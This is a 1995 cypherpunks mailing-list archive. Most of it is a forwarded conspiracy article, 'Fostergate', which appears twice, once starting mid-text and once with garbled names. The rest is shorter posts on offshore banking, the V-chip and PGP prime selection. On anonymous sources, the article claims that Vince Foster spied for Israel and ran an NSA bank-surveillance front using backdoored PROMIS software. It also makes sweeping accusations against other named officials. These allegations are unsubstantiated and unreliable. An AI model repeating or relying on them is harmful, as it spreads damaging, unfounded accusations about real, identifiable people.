community monitor the previously confidential flow of bank wire transfers.
This was no small task; more than $1 trillion a day moves through New
York alone.
  Bailey, himself constrained by the National Security Act, claims he 
doesn't know exactly how the data was collected. But he confirms that 
within a few years (of 1981) The National Security Agency (NSA), the 
signals intelligence arm of the government, had begun vacuuming up 
mountains of data by listening in on bank wire traffic. It became a joint 
effort of several Western governments with the Israelis playing a leading 
role, since they were the main targets of terrorism.
  Other intelligence experts say the flow of bits and bytes was captured 
by various means; from simply tapping phone lines to implanting 
customized chips in bank computers to store up and periodically
"burst-transmit" data to a passing van, or low-flying "sig-int" or signals
intelligence satellite. Another part of the problem was to get the
world's banks to standardize their data so that it could be easily
analyzed. And that brings us to PROMIS, a powerful tracking
software developed for the U.S. Government and then further enhanced by a
little company called Inslaw Inc.
  PROMIS stands for Prosecutor's Management Information Systems and was 
designed to manage legal cases. In 1982, just as Bailey's
follow-the-money effort was gaining steam, the Reagan Justice Department
eagerly snapped up Inslaw's newest version of PROMIS. But the government
refused to pay the $6 million owed for it, claiming part of the contract
was not fulfilled. Inslaw, forced into Chapter 11 reorganization, and
nearly driven to quick liquidation by the government and its former
partner AT&T, hotly denied that claim. Ultimately, a bankruptcy judge ruled the 
government stole the PROMIS software by "trickery, fraud and deceit."
  Why PROMIS? Because it was adaptable. Besides tracking legal cases, it 
could be easily customized to track anything from computer chip design to 
complex monetary transactions. It was especially useful for tracking 
criminals or just plain political dissidents. Inslaw claims the software 
was eventually illegally sold to as many as 50 countries for use by their 
police, military or intelligence agencies, including such bloody regimes 
as Guatemala, South Africa and Iraq (before the 1990 invasion of Kuwait). 
Profits on these sales, Inslaw claims, went mainly into the private 
pockets of Republican political cronies in the 1980s, including Reagan 
confidant Earl Brian, former part-owner of UPI and FNN.
  Among the biggest profiteers on PROMIS, according to the 1992 book by 
former Israeli anti-terrorism staffer Ari Ben-Menashe, was former 
British publisher Bob Maxwell. On behalf of the Israelis, Maxwell 
aggressively marketed a doctored version of PROMIS equipped with one or 
more "back doors" to allow an outsider to tap into the user's data base 
without leaving an audit trail. In fact, it may have been such rigged 
programs that allowed noted Israeli spy Jonathan Pollard, from his 
computer terminal at the Office of Naval Intelligence in Washington, to 
download vast amounts of top secret U.S. nuclear weapons and code data in 
the mid-1980s.
  According to a heavily-redacted New Mexico FBI counterintelligence 
report, Maxwell was apparently allowed to sell two copies of PROMIS back 
to the U.S. weapons labs at Sandia and Los Alamos, for what Inslaw claims 
was a hugely inflated price of $87 million. That would have allowed 
Pollard, if he was using the rigged program, to obtain U.S. missile 
targeting data long before Israel had its own satellite capability, thus 
making it a real nuclear threat to the Soviet Union. Pollard was 
convicted of espionage and sentenced in 1986 to life imprisonment. U.S. 
officials have vehemently opposed efforts to gain his early release.
  Maxwell, according to Ben-Menashe and nine other sources, was also 
selling pirated versions of PROMIS to major world banks for use in their 
wire transfer rooms to track the blizzard of numbers, authorization codes 
and confirmations required on each wire transaction. Don't expect any 
banks to admit running PROMIS software. They probably now know it was 
pilfered. But they readily took it both because it was the best tracking 
software available at the time and because the U.S. government was 
tacitly leaning on them to go along with the surveillance effort or face 
regulatory reprisals or prosecution on money laundering charges. With the 
widespread adoption of PROMIS, the data became standardized and much 
easier to analyze by the NSA.
  It took some effort to install and support PROMIS in the banking 
industry. That's where Vince Foster came in. Sources say that since at 
least the late 1970s, Foster had been a silent, behind-the-scenes 
overseer on behalf of the NSA for a small Little Rock, Ark., bank data 
processing company. Its name was Systematics Inc., launched in 1967 and 
funded and controlled for most of its life by Arkansas billionaire 
Jackson Stephens, a 1946 Naval Academy graduate along with Jimmy Carter. 
Foster was one of Stephens' trusted deal makers at the Rose Law Firm, 
where he was partner with Hillary Rodham Clinton, Webster Hubbell and 
William Kennedy (whose father was a Systematics director). Hubbell also 
played an overseer role at Systematics for the NSA for some years 
according to intelligence sources.
  Systematics has had close ties to the NSA and CIA ever since its 
founding, sources say, as a money-shuffler for covert operations. It is 
no secret that there were billions of dollars moving around in "black" 
accounts - from buying and selling arms to the Contras, Iran, Iraq, 
Angola, and other countries to paying CIA operatives and laundering money 
from clandestine CIA drug dealing (such as at Mena, Arkansas). Having 
taken over the computer rooms in scores of small U.S. banks as an "out-
sourced" supplier of data processing, Systematics was in a unique 
position to manage that covert money flow. Sources say the money was 
moved at the end of every day disguised as a routine bank-to-bank 
balancing transaction, out of view of bank regulators and even the banks 
themselves. In short, it became cyber-money.
  One man who uncovered the link between Systematics, Foster and covert 
money movements from arms and drugs was Bob Bickel, who was an undercover 
Customs investigator in the 1980s. "We found Systematics was often a 
conduit for the funds" in arms and drug transactions, says Bickel, now 
living in Texas: "They were the money changers." His story is 
corroborated by a former CIA employee who says it was well known within 
the agency in the late 1970s that Foster was involved with Systematics in 
covert money management.
  Another source is Michael Ricoposciuto, former research director of the 
covert arms operation at California's tiny Cabazon Indian Reservation in 
the early 1980s. Ricoposciuto claims his crew of computer programmers 
helped customize PROMIS there for banking and other uses. He is now 
serving 80 years in a South Carolina federal prison ostensibly on drug 
charges. Though maybe not a credible source on his own, his story fits 
well with other sources.
  Systematics' money-laundering role for the intelligence community might 
help explain why Jackson Stephens tried to take over Washington-based 
Financial General Bankshares in 1978 on behalf of Arab backers of the 
Bank of Credit and Commerce International (BCCI). BCCI's links to global 
corruption and intelligence operations have been well documented, though 
many mysteries remain.
  According to a lawsuit filed by the Securities and Exchange Commission, 
Stephens insisted on having then-tiny Systematics brought in to take over 
all of FGB's data processing. Representing Systematics in that 1978 SEC 
case: Hillary Rodham Clinton and Webster Hubbell. Stephens was blocked in 
that takeover. But FGB, later renamed First American, ultimately fell 
under the alleged domination of BCCI through Robert Altman and former 
Defense Secretary Clark Clifford. According to a technician who worked 
for First American in Atlanta, Systematics became a key computer 
contractor there anyway.
  In the 1980s, Systematics' business boomed. When it first sold stock to 
the public in 1983, revenues were $64 million. That had risen to $230 
million by the time Stephens arranged Systematics' sale to Alltel Corp., 
a telephone holding company which then moved its headquarters to Little 
Rock. Last year, Systematics sales hit $861 million - a third of Alltel's 
total. Stephens now owns more than 8 percent of Alltel and wields 
significant influence over the company.
  When Bill Clinton was elected president in 1992, bringing Foster, 
Hubbell and Kennedy to the White House staff, Systematics' foreign bank 
business flourished. It began to announce a flood of data processing 
deals with major banks in Moscow, Maoso, Singapore, Malaysia, Pakistan, 
Trinidad and elsewhere. According to veteran bank software vendors, and 
computer intelligence specialist Wayne Madsen, co-author of a book about 
the NSA called "The Puzzle Palace", it is inconceivable any U.S. company 
could land such lucrative work without the intimate participation of the 
NSA. Domestic business took off as well, with giants like Citibank and 
Nations Bank signing big data processing deals.
  Working alongside Systematics in this spooky world of bank computer 
spying appears to be a cluster of other curious, loosely-affiliated 
companies. For instance, there is Boston Systematics, headed by former 
CIA officer Harry Wechsler, who controls two Israeli companies that also 
use the name Systematics. Wechsler denies any connection to the Arkansas 
company (now named Alltel Information Services) and claims to know 
nothing of PROMIS. Odd, then, that Inslaw claims it got two inquiries in 
1987 from Wechsler's Israeli company seeking marketing data on PROMIS.
  Many of the intelligence sources who provided information for this 
story insist that Boston Systematics and the Arkansas company are, in 
fact, related in some way. And based on his own source in the Justice 
Department, Inslaw's founder William A. Hamilton says he believes Boston 
Systematics was also closely linked with both Maxwell and Rafl Bitan, the 
former head of Israel's anti-terrorism effort. Hamilton says Bitan, using 
a false name, showed up at Inslaw's Washington, DC office one day in 1983 
for a private demonstration of PROMIS.
  Another curious company is Arkansas Systems, founded in 1974 by 
Systematics employee and formerly U.S. Army "analyst" John Chamberlain, 
located just down the road from Systematics. Arkansas Systems specializes 
in computer systems for foreign wire transfer centers and central banks. 
Among its clients: Russia and China, according to Arkansas Systems 
president James K. Hendren, a physicist formerly involved with the 
Safeguard anti-missile system. Arkansas Systems was one of the first 
companies to receive funding from the Arkansas Development Finance 
Authority (ADFA), an agency created by Bill Clinton that is now coming 
under Congressional scrutiny.
  What does Alltel have to say about all of this? "I've never heard 
anything so asinine in all my life," steams Joe T. Ford, Alltel's 
chairman and the father of Jack Stephens' chief administrative aide.
  John Stouri, a former IBM executive who is chief executive of Alltel 
Information Services, says he had never heard of Boston Systematics 
before this inquiry. He declares that the Arkansas company does almost no 
work for the government, scoffs at the idea his company is tied to the 
NSA and says Foster has never had any connection to Systematics. As for 
the fact he sold half his 700,000 Alltel shares in February at $34, just 
before it began skidding to under $24, he says that was merely to pay for 
the exercise of options.
  Why is it then that Hamilton claims sources in two separate 
intelligence agencies say documents relating to Systematics were among 
those taken from Foster's office immediately after Foster's death? Indeed,
a private investigator close to the continuing "Whitewater" probe by 
Independent Counsel Kenneth W. Starr says he has learned that Hubbell has 
delivered those documents - including papers related to Systematics - to 
Starr. Hubbell pleaded guilty last December to two felony counts related 
to over-billing at the Rose Law Firm and has been sentenced to 21 months 
in prison.
  If Foster knew the U.S. was spying on foreign banks, why would he let 
himself be caught red-handed with a Swiss bank account? The answer may be 
that the Israeli transactions were, in fact, well concealed, according to 
the veteran CIA source. And Foster would have known that, unless a prober 
knew exactly what to look for, finding his payoffs in the torrent of 
routine wire transfer data would be a hopeless task. Besides that, greed 
could explain a lot, if not Foster's then for whomever else he might have 
been playing bagman. The CIA source says Foster was not the only one in 
the White House under suspicion for peddling state secrets.
  All of which helps explain Foster's odd behavior before his death. He 
was a tough, smart trial attorney at the peak of power in Washington. 
Only 48 years old, he was in excellent health. Suddenly, according to the 
Fiske report, he couldn't sleep. He complained of heart palpitations and 
high blood pressure. His sister arranged for him to see a Washington 
psychiatrist, who later told the FBI he had been instructed not to take 
notes because Foster's depression was "directly related to highly 
sensitive and confidential matters" tied to his "top secret" government 
work.
  Foster never saw a shrink. Instead, about a week before he died, he 
hired a lawyer: high-powered DC criminal attorney and political fix-it 
man James Hamilton. Foster's wife claims his reason was the White House 
Travel Office controversy, which was expected to lead to congressional 
hearings.
  On the weekend of July 17 and 18, Foster drove with his wife to the 
eastern shore of Maryland to relax. By "coincidence", according to the 
Fiske report, so did Hubbell. They met at the posh estate of Michael 
Cardozo, head of Clinton's legal defense fund and son-in-law of prominent 
Democratic fund raiser Nathan Landau. Hubbell later claimed the weekend 
was a laid-back gathering of tennis and poolside chit-chat.
  But according to sources connected to the CIA, Justice Department and 
another intelligence agency, the meeting was under surveillance. The 
agenda? Heavy duty damage control. Foster was grilled. To whom else could 
the Swiss money be traced? How could the scandal be contained?


Sorry. File too long. Maybe someone else can post rest. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 31 Jul 95 01:00:31 PDT
To: cypherpunks@toad.com
Subject: Why Vince Foster Was Killed
Message-ID: <199507310800.KAA12393@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
From: QDQD56A@prodigy.com (Ct Buskuhl)
Newsgroups: alt.current-events.clinton.whitewater
Subject: Fostergate Reprint
Date: 31 Jul 1995 05:40:06 GMT

James Norman is the Senior Editor for the highly respected FORBES 
magazine. Several months ago, he wrote an article about the death of 
Vince Foster, called "Fostergate." 

  This article was set to run and was pulled at the last minute by forces 
that are unknown at this time. You may recall a similar situation with 
the Washington Post spiking the Mena story at the last minute - despite 
their own lawyers clearing it to run. The Mena story ended up in this 
month's Penthouse magazine of all places. Fortunately Mr. Norman's 
article found a more respectable home - at Media Bypass!
  Media Bypass will feature this article in their August issue. I 
certainly owe them a little plug for posting this in advance. You may 
subscribe to it by calling 1-800-4-BYPASS. 
  The article is as follows:

FOSTERGATE
by James R. Norman

"Was White House Deputy Counsel Vince Foster selling US secrets to Israel?
The CIA suspects he was."

  TWO weeks before his death on July 20, 1993, White House Deputy Counsel 
Vincent W. Foster went into a deep funk. The official cause of death, 
given by former Independent Counsel Robert Fiske Jr. (who was later 
replaced by Kenneth Starr), was suicide driven by depression over, among 
other things, several newspaper editorials. But Vince Foster had a much 
bigger and darker reason to be seriously burned out. He had just learned 
he was under investigation for espionage.
  Outrageous? To say the least. But a lengthy investigation has located 
over a dozen sources with connections to the intelligence community who 
confirm a shocking story of money laundering and espionage connected to 
the highest levels of the White House. Without grants of immunity, the 
sources risk going to prison for violation of the National Security Act. 
Virtually all have demanded anonymity.
  According to a veteran Central Intelligence Agency operative close to 
the Foster investigation, Foster's first indication of trouble came when 
he inquired about his coded bank account at Banca Della Svizzera Italiana 
in Chiasso, Switzerland and found the account empty. Foster was shocked 
to learn from the bank that someone using his secret authorization code 
had withdrawn all $2.73 million he had stashed there and had moved it to, 
of all places, the U.S. Treasury.
  Then, according to credit card records reviewed by a private 
investigator who has revealed them, Foster canceled the two-day round-
trip TWA and Swiss Air plane tickets to Geneva he had purchased on his 
American Express card through the White House travel office on July 1. 
  Discreetly he began asking what was afoot, says the CIA source, 
confirming that someone in the White House tipped him off. It was bad 
news. The CIA had Foster under serious investigation for leaking high-
security secrets to the State of Israel.
  For months, a small cadre of CIA computer hackers known as the Fifth 
Column, armed with a Cray supercomputer, had been monitoring Foster's 
Swiss account. They had located it by tracking money flows from various 
Israeli government accounts after finding Foster's name while secretly 
snooping through the electronic files of Israel's Mossad. Then by 
snooping through the bank files, they gathered all the information needed 
to withdraw the money. 
  Foster was just one of the first of scores of high level U.S. political 
figures to thus have their secret Swiss accounts looted of illicit funds, 
according to both this veteran CIA source and a separate source in 
another intelligence agency. Over the past two years, they say, more than 
$2 billion has been swept out of offshore bank accounts belonging to 
figures connected to the U.S. government with nary a peep from the 
victims or their banks. The claim that Foster and other U.S. figures have 
had offshore accounts has been confirmed by a separate high-ranking CIA 
source and another in the Department of Justice. 
  Various sources, some of them controversial, have contributed other 
pieces to this puzzle. Whatever their motivations, those sources have 
proven remarkably consistent. Their stories jibe well with known facts 
and offer a most plausible explanation for Foster's mysterious depression.
It would also explain Washington's determined effort to dismiss the 
Foster affair as a tragic but simple suicide.
  Vince Foster a spy? Actually, it is much worse than that, if the CIA's 
suspicions are confirmed by the ongoing foreign counterintelligence probe.
He would have been an invaluable double agent with potential access to 
not only high-level political information, but also to sensitive code, 
encryption and data transmission secrets, the stuff by which modern war 
is won or lost. That is because for many years, according to nine 
separate current and former U.S. law enforcement or intelligence 
officials, Foster had been a behind-the-scenes manager of a key support 
company in one of the biggest, most secretive spy efforts on record, the 
silent surveillance of banking transactions both here and abroad.
  This bank snooping effort began in earnest soon after Ronald Reagan 
became president in 1981. Its primary aim was to track the money behind 
international terrorist groups and soon came to be dubbed, "Follow the 
money", according to the originator of the program Norman A. Bailey. Now 
a private Washington consultant on international banking, Bailey was an 
economist and Reagan advisor on the National Security Council. It was 
Bailey's idea to begin using powerful new computer and electronic 
eavesdropping technologies then emerging to let the intelligence 
community monitor the previously confidential flow of bank wire transfers.
This was no small task; more than $1 trillion a day moves through New 
York alone.
  Bailey, himself constrained by the National Security Act, claims he 
doesn't know exactly how the data was collected. But he confirms that 
within a few years (of 1981) The National Security Agency (NSA), the 
signals intelligence arm of the government, had begun vacuuming up 
mountains of data by listening in on bank wire traffic. It became a joint 
effort of several Western governments with the Israelis playing a leading 
role, since they were the main targets of terrorism.
  Other intelligence experts say the flow of bits and bytes was captured 
by various means; from simply tapping phone lines to implanting 
customized chips in bank computers to store up and periodically "burst-
transmit" data to a passing van, or low-flying "sig-int" or signals 
intelligence satellite. Another part of the problem was to get the 
world's banks to standardize their data so that it could be easily 
analyzed. And that brings us to PROMIS, a powerful tracking 
software developed for the U.S. Government and then further enhanced by a 
little company called Inslaw Inc.
  PROMIS stands for Prosecutor's Management Information Systems and was 
designed to manage legal cases. In 1982, just as Bailey's follow-the-
money effort was gaining steam, the Reagan Justice Department eagerly 
snapped up Inslaw's newest version of PROMIS. But the government refused 
to pay the $6 million owed for it, claiming part of the contract was not 
fulfilled. Inslaw, forced into Chapter 11 reorganization, and nearly 
driven to quick liquidation by the government and its former partner AT&T,
hotly denied that claim. Ultimately, a bankruptcy judge ruled the 
government stole the PROMIS software by "trickery, fraud and deceit."
  Why PROMIS? Because it was adaptable. Besides tracking legal cases, it 
could be easily customized to track anything from computer chip design to 
complex monetary transactions. It was especially useful for tracking 
criminals or just plain political dissidents. Inslaw claims the software 
was eventually illegally sold to as many as 50 countries for use by their 
police, military or intelligence agencies, including such bloody regimes 
as Guatemala, South Africa and Iraq (before the 1990 invasion of Kuwait). 
Profits on these sales, Inslaw claims, went mainly into the private 
pockets of Republican political cronies in the 1980s, including Reagan 
confidant Barl Brain, former part-owner of UPI and FNN.
  Among the biggest profiteers on PROMIS, according to the 1992 book by 
former Israeli anti-terrorism staffer Ari Ben-Menaseche, was former 
British publisher Bob Maxwell. On behalf of the Israelis, Maxwell 
aggressively marketed a doctored version of PROMIS equipped with one or 
more "back doors" to allow an outsider to tap into the user's data base 
without leaving an audit trail. In fact, it may have been such rigged 
programs that allowed noted Israeli spy Jonathon Pollard, from his 
computer terminal at the Office of Naval Intelligence in Washington, to 
download vast amounts of top secret U.S. nuclear weapons and code data in 
the mid-1980s.
  According to a heavily-redacted New Mexico FBI counterintelligence 
report, Maxwell was apparently allowed to sell two copies of PROMIS back 
to the U.S. weapons labs at Sandia and Los Alamos, for what Inslaw claims 
was a hugely inflated price of $87 million. That would have allowed 
Pollard, if he was using the rigged program, to obtain U.S. missile 
targeting data long before Israel had its own satellite capability, thus 
making it a real nuclear threat to the Soviet Union. Pollard was 
convicted of espionage and sentenced in 1986 to life imprisonment. U.S. 
officials have vehemently opposed efforts to gain his early release.
  Maxwell, according to Ben-Menaseche and nine other sources, was also 
selling pirated versions of PROMIS to major world banks for use in their 
wire transfer rooms to track the blizzard of numbers, authorization codes 
and confirmations required on each wire transaction. Don't expect any 
banks to admit running PROMIS software. They probably now know it was 
pilfered. But they readily took it both because it was the best tracking 
software available at the time and because the U.S. government was 
tacitly leaning on them to go along with the surveillance effort or face 
regulatory reprisals or prosecution on money laundering charges. With the 
widespread adoption of PROMIS, the data became standardized and much 
easier to analyze by the NSA.
  It took some effort to install and support PROMIS in the banking 
industry. That's where Vince Foster came in. Sources say that since at 
least the late 1970s, Foster had been a silent, behind-the-scenes 
overseer on behalf of the NSA for a small Little Rock, Ark., bank data 
processing company. Its name was Systematics Inc., launched in 1967 and 
funded and controlled for most of its life by Arkansas billionaire 
Jackson Stephens, a 1946 Naval Academy graduate along with Jimmy Carter. 
Foster was one of Stephens' trusted deal makers at the Rose Law Firm, 
where he was partner with Hillary Rodham Clinton, Webster Hubbell and 
William Kennedy (whose father was a Systematics director). Hubbell also 
played an overseer role at Systematics for the NSA for some years 
according to intelligence sources.
  Systematics has had close ties to the NSA and CIA ever since its 
founding, sources say, as a money-shuffler for covert operations. It is 
no secret that there were billions of dollars moving around in "black" 
accounts - from buying and selling arms to the Contras, Iran, Iraq, 
Angola, and other countries to paying CIA operatives and laundering money 
from clandestine CIA drug dealing (such as at Mena, Arkansas). Having 
taken over the computer rooms in scores of small U.S. banks as an "out-
sourced" supplier of data processing, Systematics was in a unique 
position to manage that covert money flow. Sources say the money was 
moved at the end of every day disguised as a routine bank-to-bank 
balancing transaction, out of view of bank regulators and even the banks 
themselves. In short, it became cyber-money.
  One man who uncovered the link between Systematics, Foster and covert 
money movements from arms and drugs was Bob Bickel, who was an undercover 
Customs investigator in the 1980s. "We found Systematics was often a 
conduit for the funds" in arms and drug transactions, says Bickel, now 
living in Texas: "They were the money changers." His story is 
corroborated by a former CIA employee who says it was well known within 
the agency in the late 1970s that Foster was involved with Systematics in 
covert money management.
  Another source is Michael Ricoposciuto, former research director of the 
covert arms operation at California's tiny Cabazon Indian Reservation in 
the early 1980s. Ricoposciuto claims his crew of computer programmers 
helped customize PROMIS there for banking and other uses. He is now 
serving 80 years in a South Carolina federal prison ostensibly on drug 
charges. Though maybe not a credible source on his own, his story fits 
well with other sources.
  Systematics' money-laundering role for the intelligence community might 
help explain why Jackson Stephens tried to take over Washington-based 
Financial General Bankshares in 1978 on behalf of Arab backers of the 
Bank of Credit and Commerce International (BCCI). BCCI's links to global 
corruption and intelligence operations have been well documented, though 
many mysteries remain.
  According to a lawsuit filed by the Securities and Exchange Commission, 
Stephens insisted on having then-tiny Systematics brought in to take over 
all of FGB's data processing. Representing Systematics in that 1978 SEC 
case: Hillary Rodham Clinton and Webster Hubbell. Stephens was blocked in 
that takeover. But FGB, later renamed First American, ultimately fell 
under the alleged domination of BCCI through Robert Altman and former 
Defense Secretary Clark Clifford. According to a technician who worked 
for First American in Atlanta, Systematics became a key computer 
contractor there anyway.
  In the 1980s, Systematics' business boomed. When it first sold stock to 
the public in 1983, revenues were $64 million. That had risen to $230 
million by the time Stephens arranged Systematics' sale to Alltel Corp., 
a telephone holding company which then moved its headquarters to Little 
Rock. Last year, Systematics sales hit $861 million - a third of Alltel's 
total. Stephens now owns more than 8 percent of Alltel and wields 
significant influence over the company.
  When Bill Clinton was elected president in 1992, bringing Foster, 
Hubbell and Kennedy to the White House staff, Systematics' foreign bank 
business flourished. It began to announce a flood of data processing 
deals with major banks in Moscow, Maoso, Singapore, Malaysia, Pakistan, 
Trinidad and elsewhere. According to veteran bank software vendors, and 
computer intelligence specialist Wayne Madsen, co-author of a book about 
the NSA called "The Puzzle Palace", it is inconceivable any U.S. company 
could land such lucrative work without the intimate participation of the 
NSA. Domestic business took off as well, with giants like Citibank and 
Nations Bank signing big data processing deals.
  Working alongside Systematics in this spooky world of bank computer 
spying appears to be a cluster of other curious, loosely-affiliated 
companies. For instance, there is Boston Systematics, headed by former 
CIA officer Harry Wechsler, who controls two Israeli companies that also 
use the name Systematics. Wechsler denies any connection to the Arkansas 
company (now named Alltel Information Services) and claims to know 
nothing of PROMIS. Odd, then, that Inslaw claims it got two inquiries in 
1987 from Wechsler's Israeli company seeking marketing data on PROMIS.
  Many of the intelligence sources who provided information for this 
story insist that Boston Systematics and the Arkansas company are, in 
fact, related in some way. And based on his own source in the Justice 
Department, Inslaw's founder William A. Hamilton says he believes Boston 
Systematics was also closely linked with both Maxwell and Rafl Bitan, the 
former head of Israel's anti-terrorism effort. Hamilton says Bitan, using 
a false name, showed up at Inslaw's Washington, DC office one day in 1983 
for a private demonstration of PROMIS.
  Another curious company is Arkansas Systems, founded in 1974 by 
Systematics employee and formerly U.S. Army "analyst" John Chamberlain, 
located just down the road from Systematics. Arkansas Systems specializes 
in computer systems for foreign wire transfer centers and central banks. 
Among its clients: Russia and China, according to Arkansas Systems 
president James K. Hendren, a physicist formerly involved with the 
Safeguard anti-missile system. Arkansas Systems was one of the first 
companies to receive funding from the Arkansas Development Finance 
Authority (ADFA), an agency created by Bill Clinton that is now coming 
under Congressional scrutiny.
  What does Alltel have to say about all of this? "I've never heard 
anything so asinine in all my life," steams Joe T. Ford, Alltel's 
chairman and the father of Jack Stephens' chief administrative aide.
  John Stouri, a former IBM executive who is chief executive of Alltel 
Information Services, says he had never heard of Boston Systematics 
before this inquiry. He declares that the Arkansas company does almost no 
work for the government, scoffs at the idea his company is tied to the 
NSA and says Foster has never had any connection to Systematics. As for 
the fact he sold half his 700,000 Alltel shares in February at $34, just 
before it began skidding to under $24, he says that was merely to pay for 
the exercise of options.
  Why is it then that Hamilton claims sources in two separate 
intelligence agencies say documents relating to Systematics were among 
those taken from Foster's office immediately after Foster's death? Indeed,
a private investigator close to the continuing "Whitewater" probe by 
Independent Counsel Kenneth W. Starr says he has learned that Hubbell has 
delivered those documents - including papers related to Systematics - to 
Starr. Hubbell pleaded guilty last December to two felony counts related 
to over-billing at the Rose Law Firm and has been sentenced to 21 months 
in prison.
  If Foster knew the U.S. was spying on foreign banks, why would he let 
himself be caught red-handed with a Swiss bank account? The answer may be 
that the Israeli transactions were, in fact, well concealed, according to 
the veteran CIA source. And Foster would have known that, unless a prober 
knew exactly what to look for, finding his payoffs in the torrent of 
routine wire transfer data would be a hopeless task. Besides that, greed 
could explain a lot, if not Foster's then for whomever else he might have 
been playing bagman. The CIA source says Foster was not the only one in 
the White House under suspicion for peddling state secrets.
  All of which helps explain Foster's odd behavior before his death. He 
was a tough, smart trial attorney at the peak of power in Washington. 
Only 48 years old, he was in excellent health. Suddenly, according to the 
Fiske report, he couldn't sleep. He complained of heart palpitations and 
high blood pressure. His sister arranged for him to see a Washington 
psychiatrist, who later told the FBI he had been instructed not to take 
notes because Foster's depression was "directly related to highly 
sensitive and confidential matters" tied to his "top secret" government 
work.
  Foster never saw a shrink. Instead, about a week before he died, he 
hired a lawyer: high-powered DC criminal attorney and political fix-it 
man James Hamilton. Foster's wife claims his reason was the White House 
Travel Office controversy, which was expected to lead to congressional 
hearings.
  On the weekend of July 17 and 18, Foster drove with his wife to the 
eastern shore of Maryland to relax. By "coincidence", according to the 
Fiske report, so did Hubbell. They met at the posh estate of Michael 
Cardozo, head of Clinton's legal defense fund and son-in-law of prominent 
Democratic fund raiser Nathan Landau. Hubbell later claimed the weekend 
was a laid-back gathering of tennis and poolside chit-chat.
  But according to sources connected to the CIA, Justice Department and 
another intelligence agency, the meeting was under surveillance. The 
agenda? Heavy duty damage control. Foster was grilled. To whom else could 
the Swiss money be traced? How could the scandal be contained?


Sorry. File too long. Maybe someone else can post rest. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Mon, 31 Jul 95 08:15:45 PDT
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: Zimmermann legal fund
In-Reply-To: <Pine.LNX.3.91.950731115906.7803A-100000@ima.net>
Message-ID: <Pine.SUN.3.91.950731100140.4105A-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 31 Jul 1995, Enzo Michelangeli wrote:

> On Sun, 30 Jul 1995, Mike Bailey wrote:
> 
> > > The US banking industry has gone to the dogs. The day a non-US bank offers
> > > an account that can be accessed over the net will be the day I close my US
> > > accounts.
> > 
> > Interesting idea ...
> > 
> > 1st question or thing I would want to be certain of is the stability of the
> > currency of the realm so to speak. I wouldn't want to bank in a country that
> > had a weak currencey (sp) or was subject to roller coaster economics.  
> 
> How could it be worse than with the U.S. of A.?? ;-)
> 
> Seriously: you may bank in US Dollars (or other major currencies) in many
> countries, including all the offshore banking centres. Limited amounts of
> cash may be withdrawn using ATM dispensers, against a fee of two or three
> USD per operation; for larger amounts, you may ask them to wire money by
> SWIFT, Telex or bank drafts to other banks or generic payees. For such
> operations, most large banks accept instructions by snail mail, and
> sometimes by fax (if the customer signs a letter of indemnity exempting
> the bank from liabilities in case of forgeries). Sadly, AFAIK no bank is
> accepting digitally encrypted and signed e-mail instructions, and issuing 
> digitally encrypted and signed receipts.
> 
I feel that this type of banking is just around the corner with the coming
tidal wave of internet based commerce.

My primary concern would be something along this scenario ... 

I open an account with U.S. $$ in a foreign bank who uses francs (don't
flame the denomination or the choice this is just an example ;-) ... a month 
later the franc loses 20 % of its value as compared to the U.S. dollar. If I 
close out my account would I not lose 20% of my money because when the money was 
deposited it was credited to the account in francs ... and when it is withdrawn 
it is converted back to $$ at the current conversion rate ? Maybe this was answered 
in the previous reply if so call me *thick* if not call me *paranoid*.

-Mike

**************************************************************************
*   Personal internet account, opinions and ideas do not reflect those   *
*                         of my employer                                 *
*       Mike Bailey                     (hm)214-252-3915                 * 
*       email bailey@computek.net       (wk)214-456-4510                 *
*                                                                        *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*               http://www.computek.net/public/bailey/                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 31 Jul 95 10:15:52 PDT
To: cypherpunks@toad.com
Subject: Re: Sex & Crime TV filter
Message-ID: <ac425d4208021004ef6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Wow! I think Ted just hit on something that could be used to quickly derail
the "V-chip":

At 4:02 PM 7/31/95, Thaddeus J. Beier wrote:

>The chip that interprets the content does it solely based on the rating
>information.  This is the so-called "v-chip" (v for violence, I think,
>not for video) that you see in the press.
...
>qualifications of most people.  Besides, what I would really
>like to filter out, what I find to be incredibly violent to the
>minds of children, is commercial advertising.  Private rating
>services could take care of these, easily, as well.

I agree, of course, about it not being the role of government/FCC/etc. to
mandate such ratings, such chips, etc.

However, to help derail this V-chip being mandated, what if we (I mean
activists, writers of columns, etc.) "insisted" that _commercials_ be
similarly labelled?

"Yes, if violence and sex is to be "voluntarily rated," we think that
commercial advertising ought to be similarly rated."

It might be hard for the legislators to avoid the logic of this.
Advertisers, fearing people would of course mute the commercials, would
then quietly urge them to drop the whole idea.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 31 Jul 95 07:43:38 PDT
To: asb@nexor.co.uk (Andy Brown)
Subject: Re: your mail
In-Reply-To: <Pine.SOL.3.91.950731132625.27376C-100000@eagle.nexor.co.uk>
Message-ID: <9507311434.AA25514@all.net>
MIME-Version: 1.0
Content-Type: text


> As I'm sure you know, PGP picks its primes by choosing a random starting 
> point and testing each odd number upwards until it gets a probable 
> prime.  The random number generator used to seed this search is mixed 
> using MD5 which gives a uniform 1/0 distribution.  I'd hazard a guess 
> that the chances of a start point having so many contiguous 1's as to be 
> close to 2^N is so vanishingly small that it's more likely a 
> non-prime would pass the probabilistic tests!

Well, not exactly random starting points.  Starting points generated by
user keystrokes with characteristics that may be analyzed so as to
reduce the key space to a searchable size, starting points that are
determined by a transformation of those keystroke sequences using an
